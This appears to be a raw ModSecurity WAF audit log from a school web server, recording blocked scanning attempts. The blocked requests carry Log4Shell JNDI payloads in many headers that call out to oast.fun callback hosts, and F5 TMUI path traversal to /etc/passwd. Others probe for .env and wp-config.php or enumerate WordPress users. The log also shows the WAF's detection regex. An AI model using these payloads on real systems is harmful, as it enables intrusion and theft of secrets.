${jndi:ldap://${:-847}${:-283}.${hostName}.xdruidcomment.d0mbkqa4kqtm561jt3n0orhphpr1sarbb.oast.fun} X-Origin: ${jndi:ldap://${:-847}${:-283}.${hostName}.xorigin.d0mbkqa4kqtm561jt3n07gskaei8y11wq.oast.fun} Cookie: ${jndi:ldap://${:-847}${:-283}.${hostName}.cookiename.d0mbkqa4kqtm561jt3n0zkice4axfr35d.oast.fun}=${jndi:ldap://${:-847}${:-283}.${hostName}.cookievalue.d0mbkqa4kqtm561jt3n0krwbnn4g9djub.oast.fun} X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 168466895 --2d2f0235-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2d2f0235-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at REQUEST_HEADERS:Referer. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747848626131220 4634 (- - -) Stopwatch2: 1747848626131220 4634; combined=3537, p1=382, p2=3099, p3=0, p4=0, p5=56, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d2f0235-Z-- --cf6c0508-A-- [22/May/2025:00:32:32 +0700] aC4OMIv3pT1iV0OxjLSELQAAAJg 103.236.140.4 38232 103.236.140.4 8181 --cf6c0508-B-- GET /wp-config.php HTTP/1.1 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.80.250 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 178.128.80.250 Accept-Encoding: gzip X-Varnish: 168467516 --cf6c0508-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --cf6c0508-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747848752225722 622 (- - -) Stopwatch2: 1747848752225722 622; combined=280, p1=239, p2=0, p3=0, p4=0, p5=40, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cf6c0508-Z-- --8312067f-A-- [22/May/2025:00:32:32 +0700] aC4OMIv3pT1iV0OxjLSELgAAAJU 103.236.140.4 38380 103.236.140.4 8181 --8312067f-B-- GET /wp-config.php HTTP/1.1 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.80.250 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 178.128.80.250 Accept-Encoding: gzip X-Varnish: 168291665 --8312067f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8312067f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747848752260028 712 (- - -) Stopwatch2: 1747848752260028 712; combined=298, p1=250, p2=0, p3=0, p4=0, p5=48, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8312067f-Z-- --bacb5711-A-- [22/May/2025:00:36:39 +0700] aC4PJ3ZGSt58M5vv3gk2XwAAABI 103.236.140.4 40322 103.236.140.4 8181 --bacb5711-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0 Iceweasel/19.0.2 Accept-Charset: utf-8 --bacb5711-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bacb5711-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747848999180718 687 (- - -) Stopwatch2: 1747848999180718 687; combined=290, p1=255, p2=0, p3=0, p4=0, p5=35, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bacb5711-Z-- --4dee507e-A-- [22/May/2025:00:52:50 +0700] aC4S8nZGSt58M5vv3gk3ogAAAAA 103.236.140.4 43738 103.236.140.4 8181 --4dee507e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 128.199.254.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 128.199.254.201 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4dee507e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4dee507e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747849970366966 2920 (- - -) Stopwatch2: 1747849970366966 2920; combined=1328, p1=458, p2=839, p3=0, p4=0, p5=31, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4dee507e-Z-- --0981201f-A-- [22/May/2025:00:57:35 +0700] aC4UD3ZGSt58M5vv3gk3rQAAAAs 103.236.140.4 44186 103.236.140.4 8181 --0981201f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.245.206.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.245.206.250 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0981201f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0981201f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747850255444066 2870 (- - -) Stopwatch2: 1747850255444066 2870; combined=1401, p1=546, p2=826, p3=0, p4=0, p5=29, sr=154, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0981201f-Z-- --deabdc24-A-- [22/May/2025:01:08:27 +0700] aC4Wm4v3pT1iV0OxjLSGXAAAAIk 103.236.140.4 44990 103.236.140.4 8181 --deabdc24-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 201.46.124.0 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 201.46.124.0 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --deabdc24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --deabdc24-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747850907649495 2733 (- - -) Stopwatch2: 1747850907649495 2733; combined=1250, p1=427, p2=793, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --deabdc24-Z-- --70cea215-A-- [22/May/2025:01:17:10 +0700] aC4YpiioYDAgD0WHUjRFdwAAAE4 103.236.140.4 45362 103.236.140.4 8181 --70cea215-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 69.64.55.95 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 Cookie: X-Forwarded-For: 69.64.55.95 Accept-Encoding: gzip X-Varnish: 168295500 --70cea215-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --70cea215-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747851430052711 654 (- - -) Stopwatch2: 1747851430052711 654; combined=303, p1=256, p2=0, p3=0, p4=0, p5=47, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70cea215-Z-- --34f3ee00-A-- [22/May/2025:01:40:01 +0700] aC4eASioYDAgD0WHUjRGWAAAAE4 103.236.140.4 46240 103.236.140.4 8181 --34f3ee00-B-- GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 168471785 --34f3ee00-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --34f3ee00-E-- --34f3ee00-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747852801119828 2498 (- - -) Stopwatch2: 1747852801119828 2498; combined=670, p1=521, p2=116, p3=0, p4=0, p5=33, sr=77, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --34f3ee00-Z-- --ca84fd3c-A-- [22/May/2025:01:40:04 +0700] aC4eBCioYDAgD0WHUjRGWgAAAEE 103.236.140.4 46240 103.236.140.4 8181 --ca84fd3c-B-- GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 168471788 --ca84fd3c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ca84fd3c-E-- --ca84fd3c-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747852804126812 2790 (- - -) Stopwatch2: 1747852804126812 2790; combined=743, p1=582, p2=128, p3=0, p4=0, p5=33, sr=120, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca84fd3c-Z-- --0247d376-A-- [22/May/2025:01:54:42 +0700] aC4hcov3pT1iV0OxjLSGkgAAAJg 103.236.140.4 46768 103.236.140.4 8181 --0247d376-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 36.37.213.225 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 36.37.213.225 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0247d376-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0247d376-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747853682189789 3548 (- - -) Stopwatch2: 1747853682189789 3548; combined=1512, p1=518, p2=956, p3=0, p4=0, p5=38, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0247d376-Z-- --b292342e-A-- [22/May/2025:02:05:17 +0700] aC4j7Rpv_mIXt2pDBOq9RgAAAMM 103.236.140.4 35110 103.236.140.4 8181 --b292342e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 175.125.92.143 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 175.125.92.143 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.137 Safari/537.36 --b292342e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b292342e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747854317060187 839 (- - -) Stopwatch2: 1747854317060187 839; combined=376, p1=342, p2=0, p3=0, p4=0, p5=34, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b292342e-Z-- --10190a21-A-- [22/May/2025:02:27:05 +0700] aC4pCXZGSt58M5vv3glChwAAABc 103.236.140.4 37322 103.236.140.4 8181 --10190a21-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 197.245.248.114 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 197.245.248.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --10190a21-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10190a21-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747855625834477 4190 (- - -) Stopwatch2: 1747855625834477 4190; combined=2138, p1=711, p2=1388, p3=0, p4=0, p5=39, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10190a21-Z-- --395d5200-A-- [22/May/2025:03:28:56 +0700] aC43iCioYDAgD0WHUjRU5AAAAFg 103.236.140.4 44714 103.236.140.4 8181 --395d5200-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 138.68.235.128 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 138.68.235.128 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --395d5200-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --395d5200-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747859336347803 808 (- - -) Stopwatch2: 1747859336347803 808; combined=306, p1=266, p2=0, p3=0, p4=0, p5=40, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --395d5200-Z-- --ca149153-A-- [22/May/2025:03:38:47 +0700] aC4512friXjg62qQwE_grgAAAIw 103.236.140.4 45412 103.236.140.4 8181 --ca149153-B-- GET /?x=${jndi:ldap://${:-847}${:-283}.${hostName}.uri.d0mbkqa4kqtm561jt3n03tmkogpatgefb.oast.fun/a} HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/129.0 Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 118237740 --ca149153-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ca149153-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at ARGS:x. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747859927099801 5437 (- - -) Stopwatch2: 1747859927099801 5437; combined=3834, p1=475, p2=3331, p3=0, p4=0, p5=28, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca149153-Z-- --25cc1223-A-- [22/May/2025:03:38:50 +0700] aC452mfriXjg62qQwE_gsAAAAI8 103.236.140.4 45420 103.236.140.4 8181 --25cc1223-B-- GET / HTTP/1.1 Referer: ${jndi:ldap://${:-847}${:-283}.${hostName}.referer.d0mbkqa4kqtm561jt3n0m6ernehca9g74.oast.fun} Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: ${jndi:ldap://${:-847}${:-283}.${hostName}.useragent.d0mbkqa4kqtm561jt3n03tp7tfsp3i9bu.oast.fun} Accept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-847}${:-283}.${hostName}.accept.d0mbkqa4kqtm561jt3n0hai991r66hji8.oast.fun} Accept-Language: ${jndi:ldap://${:-847}${:-283}.${hostName}.acceptlanguage.d0mbkqa4kqtm561jt3n0i5rbwjuci7h86.oast.fun} Access-Control-Request-Headers: ${jndi:ldap://${:-847}${:-283}.${hostName}.accesscontrolrequestheaders.d0mbkqa4kqtm561jt3n0943rwfqaiqo5q.oast.fun} Access-Control-Request-Method: ${jndi:ldap://${:-847}${:-283}.${hostName}.accesscontrolrequestmethod.d0mbkqa4kqtm561jt3n0x8njoxu3af9gr.oast.fun} Authentication: Bearer ${jndi:ldap://${:-847}${:-283}.${hostName}.authenticationbearer.d0mbkqa4kqtm561jt3n0nunkonit63ety.oast.fun} Location: ${jndi:ldap://${:-847}${:-283}.${hostName}.location.d0mbkqa4kqtm561jt3n0ohhbtasqo54n5.oast.fun} Origin: ${jndi:ldap://${:-847}${:-283}.${hostName}.origin.d0mbkqa4kqtm561jt3n01bisstyhs93ig.oast.fun} Upgrade-Insecure-Requests: ${jndi:ldap://${:-847}${:-283}.${hostName}.upgradeinsecurerequests.d0mbkqa4kqtm561jt3n0eknob614afpf1.oast.fun} X-Api-Version: ${jndi:ldap://${:-847}${:-283}.${hostName}.xapiversion.d0mbkqa4kqtm561jt3n0cm8tochypc91j.oast.fun} X-CSRF-Token: ${jndi:ldap://${:-847}${:-283}.${hostName}.xcsrftoken.d0mbkqa4kqtm561jt3n03mqh5j5wned6j.oast.fun} X-Druid-Comment: 
${jndi:ldap://${:-847}${:-283}.${hostName}.xdruidcomment.d0mbkqa4kqtm561jt3n0jcjhjofaa51m9.oast.fun} X-Origin: ${jndi:ldap://${:-847}${:-283}.${hostName}.xorigin.d0mbkqa4kqtm561jt3n0k6iwjcx9i68tx.oast.fun} Cookie: ${jndi:ldap://${:-847}${:-283}.${hostName}.cookiename.d0mbkqa4kqtm561jt3n0ww1ar467znihy.oast.fun}=${jndi:ldap://${:-847}${:-283}.${hostName}.cookievalue.d0mbkqa4kqtm561jt3n04mwr4dq7sux9k.oast.fun} X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 118237743 --25cc1223-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --25cc1223-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at REQUEST_HEADERS:Referer. [file 